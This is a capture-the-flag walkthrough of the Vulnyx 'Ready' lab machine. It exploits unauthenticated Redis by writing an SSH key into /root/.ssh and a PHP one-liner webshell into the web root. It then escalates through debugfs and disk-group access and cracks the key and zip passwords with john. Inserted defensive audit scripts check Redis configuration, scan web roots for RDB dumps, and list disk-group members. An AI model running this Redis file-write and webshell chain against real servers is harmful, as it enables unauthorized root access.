Vulnyx-Ready-Walkthrough
城南花已开 Lv6

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.208 08:00:27:17:3e:c2 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e5:e5:eb VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.084 seconds (122.84 hosts/sec). 4 responded
export ip=192.168.60.208
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.208:22
Open 192.168.60.208:80
Open 192.168.60.208:6379
Open 192.168.60.208:8080
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 12:02 CST
Initiating ARP Ping Scan at 12:02
Scanning 192.168.60.208 [1 port]
Completed ARP Ping Scan at 12:02, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:02
Completed Parallel DNS resolution of 1 host. at 12:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 12:02
Scanning 192.168.60.208 [4 ports]
Discovered open port 8080/tcp on 192.168.60.208
Discovered open port 6379/tcp on 192.168.60.208
Discovered open port 80/tcp on 192.168.60.208
Discovered open port 22/tcp on 192.168.60.208
Completed SYN Stealth Scan at 12:02, 0.04s elapsed (4 total ports)
Nmap scan report for 192.168.60.208
Host is up, received arp-response (0.00067s latency).
Scanned at 2025-02-26 12:02:38 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
6379/tcp open redis syn-ack ttl 64
8080/tcp open http-proxy syn-ack ttl 64
MAC Address: 08:00:27:17:3E:C2 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

Ports 80 and 8080 are open, so let's enumerate directories.

Nothing at all was found.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.208
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10705]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

❯ gobuster dir -u http://$ip:8080 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.208:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10705]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

However, a Redis service is also exposed.


Writing an SSH public key

Honestly, if you do this box today it can be finished in seconds.

A single fscan run exploits the Redis instance to write a public key into root's authorized_keys file and finishes the box outright.

❯ fscan -h $ip --rf ../.ssh/id_rsa.pub

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[*] 共解析 218 个有效端口
[+] 端口开放 192.168.60.208:80
[+] 端口开放 192.168.60.208:22
[+] 端口开放 192.168.60.208:6379
[+] 端口开放 192.168.60.208:8080
[+] 存活端口数量: 4
[*] 开始漏洞扫描...
[+] Redis扫描模块开始...
[*] 网站标题 http://192.168.60.208 状态码:200 长度:10705 标题:Apache2 Test Debian Default Page: It works
[*] 网站标题 http://192.168.60.208:8080 状态码:200 长度:10705 标题:Apache2 Test Debian Default Page: It works
[+] Redis 192.168.60.208:6379 发现未授权访问 文件位置:/root/dump.rdb
[+] Redis 192.168.60.208:6379 可写入路径 /root/.ssh/
[!] 扫描错误 192.168.60.208:22 - 扫描总时间超时: context deadline exceeded
[+] Redis 192.168.60.208:6379 SSH公钥写入成功
[+] Redis 192.168.60.208:6379 可写入路径 /var/spool/cron/
[+] 扫描已完成: 4/4
[*] 扫描结束,耗时: 11.095615855s
❯ ssh root@$ip -i .ssh/id_rsa
Warning: Identity file .ssh/id_rsa not accessible: No such file or directory.
The authenticity of host '192.168.60.208 (192.168.60.208)' can't be established.
ED25519 key fingerprint is SHA256:7e6nZsLIg3VH7MUpoakFpn75ysrvjz0K0YGrMGHcpLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.208' (ED25519) to the list of known hosts.
Linux ready 5.10.0-16-amd64 #1 SMP Debian 5.10.127-1 (2022-06-30) x86_64
Last login: Wed Jul 12 18:22:32 2023
root@ready:~# ls -al
total 32
drwx------ 4 root root 4096 abr 18 2023 .
drwxr-xr-x 18 root root 4096 jul 19 2022 ..
lrwxrwxrwx 1 root root 9 jul 19 2022 .bash_history -> /dev/null
-rwx------ 1 root root 3526 jul 19 2022 .bashrc
drwx------ 3 root root 4096 jul 19 2022 .local
-rwx------ 1 root root 161 jul 9 2019 .profile
-rw------- 1 root root 225 abr 18 2023 root.zip
-rw-r--r-- 1 root root 66 abr 17 2023 .selected_editor
drwx------ 2 root root 4096 feb 26 05:07 .ssh
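What fscan reports here (unauthenticated access, writable /root/.ssh/ and /var/spool/cron/) comes down to a handful of redis.conf settings. The following audit script is an added example, not code from the post or from fscan: it parses redis.conf text and flags the settings that let any client on the network use CONFIG SET dir/dbfilename plus SAVE to drop a file wherever the Redis process can write. The two sample configurations are constructed, and the password value is a placeholder.

```python
# Added example: audit redis.conf for the settings that make the Redis -> file-write
# path possible. Sample configs below are constructed; the password is a placeholder.
WEAK_CONF = """\
# constructed sample: an exposed instance with no authentication
bind 0.0.0.0
protected-mode no
dir /root
"""

HARDENED_CONF = """\
# constructed sample: loopback only, auth required, file-dropping commands disabled
bind 127.0.0.1 -::1
protected-mode yes
requirepass "<placeholder-long-random-secret>"
rename-command CONFIG ""
rename-command SAVE ""
dir /var/lib/redis
"""

WILDCARD_BINDS = {"0.0.0.0", "*", "::", "::*"}


def parse_conf(text):
    """Map each directive to the list of its values (bind and rename-command may repeat)."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        conf.setdefault(key.lower(), []).append(value.strip())
    return conf


def audit_redis_conf(text):
    """Return human-readable findings; an empty list means none of the weak settings is present."""
    conf = parse_conf(text)
    findings = []
    # Redis 6 bind syntax allows "-::1" (optional address), so strip the leading dash
    binds = {tok.lstrip("-") for v in conf.get("bind", []) for tok in v.split()}
    if not binds or binds & WILDCARD_BINDS:
        findings.append("bind: listens on all interfaces (or has no bind line at all)")
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode no: remote clients are accepted without a password")
    if not conf.get("requirepass") or conf["requirepass"][-1] == '""':
        findings.append("requirepass unset: anyone who reaches the port is an administrator")
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    for cmd in ("CONFIG", "SAVE"):
        if cmd not in renamed:  # an ACL rule denying the command is an equivalent fix
            findings.append(f"{cmd} still callable: dir/dbfilename can point at any writable path")
    return findings
```

Run it against `open("/etc/redis/redis.conf").read()` on a host; any finding means the instance would fail the same way this box did.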

User privilege escalation

Writing a webshell

Let's still follow the normal route.

Redis lets us set dir to the web root,

then write a one-liner webshell and get a reverse shell.

6379 - Pentesting Redis - HackTricks

❯ redis-cli -h $ip -p 6379
192.168.60.208:6379> config set dir /usr/share/nginx/html
(error) ERR Changing directory: No such file or directory
192.168.60.208:6379> config set dir /var/www/html
OK
192.168.60.208:6379> CONFIG set dbfilename rev.php
OK
192.168.60.208:6379> set test "<?=`$_GET[0]`?>"
OK
192.168.60.208:6379> save

Try executing it.

Because the response is binary data, --output - is needed.

❯ curl "192.168.60.208:8080/rev.php?0=id" --output -
REDIS0009 redis-ver6.0.16
redis-bits@ctimeused-memhP
aof-preamblexB
testuid=1000(ben) gid=1000(ben) groups=1000(ben),6(disk)
0%
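The curl output shows what such a planted file looks like on disk: a full RDB dump whose header is the magic REDIS followed by a four-digit version (REDIS0009 here), with the payload stored as an ordinary string value inside it. That header makes the technique easy to spot. The script below is an added example, not part of the post: it walks a web root and reports every file that starts with the RDB magic, noting whether a PHP open tag appears in the dump. The sample web root it builds is constructed; the dump bytes mimic the shape of an RDB file, not an exact copy.

```python
# Added example: find Redis RDB dumps saved into a web root.
# The sample files are constructed in a temp dir; the rev.php bytes only mimic RDB layout.
import os
import re
import tempfile

RDB_MAGIC = re.compile(rb"^REDIS(\d{4})")


def inspect_file(path):
    """Return (rdb_version, contains_php_tag) or None when the file is not an RDB dump."""
    with open(path, "rb") as f:
        data = f.read(65536)  # header plus enough body to see a short planted value
    m = RDB_MAGIC.match(data)
    if not m:
        return None
    return int(m.group(1)), b"<?" in data


def find_rdb_files(webroot):
    """Walk webroot and return sorted [(relative_path, rdb_version, has_php_tag), ...]."""
    hits = []
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            full = os.path.join(dirpath, name)
            info = inspect_file(full)
            if info:
                hits.append((os.path.relpath(full, webroot), *info))
    return sorted(hits)


def build_sample_webroot(base):
    """Constructed sample: the default index.html next to a dump that was saved as rev.php."""
    os.makedirs(base, exist_ok=True)
    with open(os.path.join(base, "index.html"), "wb") as f:
        f.write(b"<html><body>It works</body></html>\n")
    with open(os.path.join(base, "rev.php"), "wb") as f:
        # magic + version, an aux field, the db selector, key "test", the planted value, EOF
        f.write(b"REDIS0009\xfa\tredis-ver\x066.0.16\xfe\x00\x00\x04test"
                b"\x0f<?=`$_GET[0]`?>\xff")
    return base


def demo():
    """Build the sample web root and scan it; on a real host call find_rdb_files('/var/www/html')."""
    return find_rdb_files(build_sample_webroot(tempfile.mkdtemp()))


if __name__ == "__main__":
    for rel, ver, php in demo():
        print(f"{rel}: RDB version {ver}, php tag present={php}")
```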

Try getting a reverse shell.

❯ pwncat-cs -lp 4444
[12:28:42] Welcome to pwncat 🐈! __main__.py:164
[12:29:09] received connection from 192.168.60.208:58708 bind.py:84
[12:29:10] 192.168.60.208:58708: registered new host w/ db manager.py:957
(local) pwncat$
(remote) ben@ready:/var/www/html$

Root privilege escalation

With the ben user in hand, we find it belongs to the disk group, so we can read the private key directly.

(remote) ben@ready:/home/ben$ cat user.txt
e5d3f520423fdef77195ac688ecc27cb
(remote) ben@ready:/home/ben$ sudo -l
Matching Defaults entries for ben on ready:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ben may run the following commands on ready:
(peter) NOPASSWD: /usr/bin/bash
(remote) ben@ready:/home/ben$ id
uid=1000(ben) gid=1000(ben) groups=1000(ben),6(disk)

sudo is a red herring; escalating to peter is of no use.

Use debugfs for arbitrary file reads, but the flag under /root is a zip archive and cannot be read directly that way.

So use the private key to connect over SSH instead.

(remote) ben@ready:/home/ben$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 6.9G 1.7G 4.9G 26% /
udev 473M 0 473M 0% /dev
tmpfs 489M 0 489M 0% /dev/shm
tmpfs 98M 488K 98M 1% /run
tmpfs 5.0M 0 5.0M 0% /run/lock
(remote) ben@ready:/home/ben$ debugfs /dev/sda1
debugfs 1.46.2 (28-Feb-2021)
debugfs: ls /root
debugfs: cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,02E266E7A66462FE
[private key body omitted]
-----END RSA PRIVATE KEY-----
debugfs:
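The disk group is the whole privilege boundary here: membership grants read access to /dev/sda1, and debugfs then bypasses every file permission on that filesystem. A quick audit is to list who holds that group, which is less obvious than it looks because /etc/group only lists supplementary members and a user whose primary gid is 6 never appears there. The script below is an added example, not from the post: it cross-checks /etc/group against /etc/passwd for that case. The sample files are constructed; ben mirrors the box, backupsvc is invented to show the primary-gid case.

```python
# Added example: list every non-root account that can read raw block devices via the
# disk group. Sample /etc/group and /etc/passwd content is constructed.
GROUP_SAMPLE = """\
root:x:0:
disk:x:6:ben
sudo:x:27:peter
"""
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
ben:x:1000:1000::/home/ben:/bin/bash
peter:x:1001:1001::/home/peter:/bin/bash
backupsvc:x:1002:6::/var/backups:/usr/sbin/nologin
"""


def parse_group(text):
    """name -> (gid, [supplementary members]) from /etc/group content."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _, gid, members = line.split(":", 3)
        groups[name] = (int(gid), [m for m in members.split(",") if m])
    return groups


def parse_passwd(text):
    """user -> primary gid from /etc/passwd content."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        users[fields[0]] = int(fields[3])
    return users


def users_with_device_access(group_text, passwd_text, group_name="disk"):
    """Sorted non-root accounts in group_name, via /etc/group membership or via primary gid."""
    groups = parse_group(group_text)
    if group_name not in groups:
        return []
    gid, members = groups[group_name]
    found = set(members)
    found |= {user for user, primary in parse_passwd(passwd_text).items() if primary == gid}
    found.discard("root")
    return sorted(found)


def audit_disk_group():
    """Run the check over the samples; on a host pass open('/etc/group').read() and the passwd file."""
    return users_with_device_access(GROUP_SAMPLE, PASSWD_SAMPLE)
```

Any account this returns can read the block device directly, so it should be treated as root-equivalent and removed from the group unless the access is required.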

Paste in the private key and try to connect.

The private key turns out to be encrypted.

(remote) ben@ready:/home/ben$ chmod 600 id_rsa
(remote) ben@ready:/home/ben$ ssh [email protected] -i id_rsa
Enter passphrase for key 'id_rsa':

Copy it to the local machine and crack it: shelly

❯ vi id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
shelly (id_rsa)
1g 0:00:00:00 DONE (2025-02-26 12:35) 100.0g/s 99200p/s 99200c/s 99200C/s marie1..babyface
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Transfer the file with scp.

Crack the archive to get the flag.

❯ scp -i ../.ssh/id_rsa root@$ip:/root/root.zip .
root.zip 100% 225 217.6KB/s 00:00
❯ x root.zip
extract: extracting to root
Archive: /home/Pepster/vulnyx/root.zip
[/home/Pepster/vulnyx/root.zip] root.txt password:
password incorrect--reenter: %
❯ zip2john root.zip >hash
ver 2.0 efh 5455 efh 7875 root.zip/root.txt PKZIP Encr: TS_chk, cmplen=43, decmplen=32, crc=68F3F801 ts=91CA cs=91ca type=8
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
already (root.zip/root.txt)
1g 0:00:00:00 DONE (2025-02-26 12:38) 100.0g/s 2457Kp/s 2457Kc/s 2457KC/s christal..280789
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ x root.zip
extract: extracting to root
Archive: /home/Pepster/vulnyx/root.zip
[/home/Pepster/vulnyx/root.zip] root.txt password:
inflating: root.txt
cat root.txt
cf537b04dd79e859816334b89e85c435%
